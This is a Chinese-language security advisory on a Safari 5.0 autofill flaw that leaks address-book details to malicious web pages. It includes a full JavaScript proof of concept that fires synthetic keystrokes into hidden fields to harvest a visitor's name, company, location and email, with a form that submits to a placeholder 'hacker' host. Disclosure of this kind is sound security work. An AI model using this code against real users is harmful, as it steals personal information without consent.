Apple Safari个人地址簿自动填充功能信息泄露漏洞

受影响系统:

Apple Safari 5.0

描述:

Safari是苹果家族机器操作系统中默认捆绑的WEB浏览器。

Safari浏览器中默认启用的自动填充功能可能会使用个人地址簿卡片中的信息,用户受骗访问了恶意网页就可能导致泄漏个人信息。

<*来源:Jeremiah Grossman
  
  链接:
http://secunia.com/advisories/40664/
        http://jeremiahgrossman.blogspot.com/2010/07/i-know-who-your-name-where-you-work-and.html
*>

测试方法:

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!<html>
<head>  

<script>

var iNames = [
    "name",
    "company",
    "city",
    "state",
    "country",
    "email",
];

function start() {
    var str = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
    var chars = str.split("");    

    var form = document.getElementById(‘mine’);
    var d = document.getElementById(‘data’);

    if (document.getElementById(‘iname’)) {
        form.removeChild(document.getElementById(‘iname’));
    }
    
    if (iNames.length > 0) {
        var input = document.createElement(‘input’);
        input.type = "text";
        input.name = iNames.shift();
        input.id = "iname";
        form.appendChild(input);
    
        d.innerHTML += "<br><b>Searching</b> \"" + input.name + "\": ";
        mine(input, chars);
    }
        
}

function mine(input, charset) {
    var d = document.getElementById(‘data’);
    var char = charset.shift();

    var flag = 0;
    
    var event = document.createEvent(‘TextEvent’);
    event.initTextEvent(‘textInput’, true, true, null, char);

    input.value = "";
    input.selectionStart = 0;
    input.selectionEnd = 0;
    input.focus();
    input.dispatchEvent(event);    
    
    setTimeout(function() {
        if (input.value.length > 1) {
            d.innerHTML += input.value + "<br>\n";
            flag++;
        }
        if ((charset.length > 0) && (! flag)) {
            mine(input, charset);
        } else {
            start();
        }
    }, 500);
}

</script>

<style>
body {
    font-size: 26px;
}

input {
    font-size: 28px;
    opacity: 1.0;
}
</style>

</head>

&lt;body&gt;

&lt;form action=&quot;http://hacker/&quot; id=&quot;mine&quot;&gt;
&lt;input type=&quot;button&quot; onclick=&quot;start();&quot; value=&quot;Start&quot;&gt;
&lt;/form&gt;
                

&lt;div id=&quot;data&quot;&gt;&lt;/div&gt;

&lt;/body&gt;
&lt;/html&gt;

建议:

 

厂商补丁:

Apple
—–
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.apple.com

发表评论?

0 条评论。

发表评论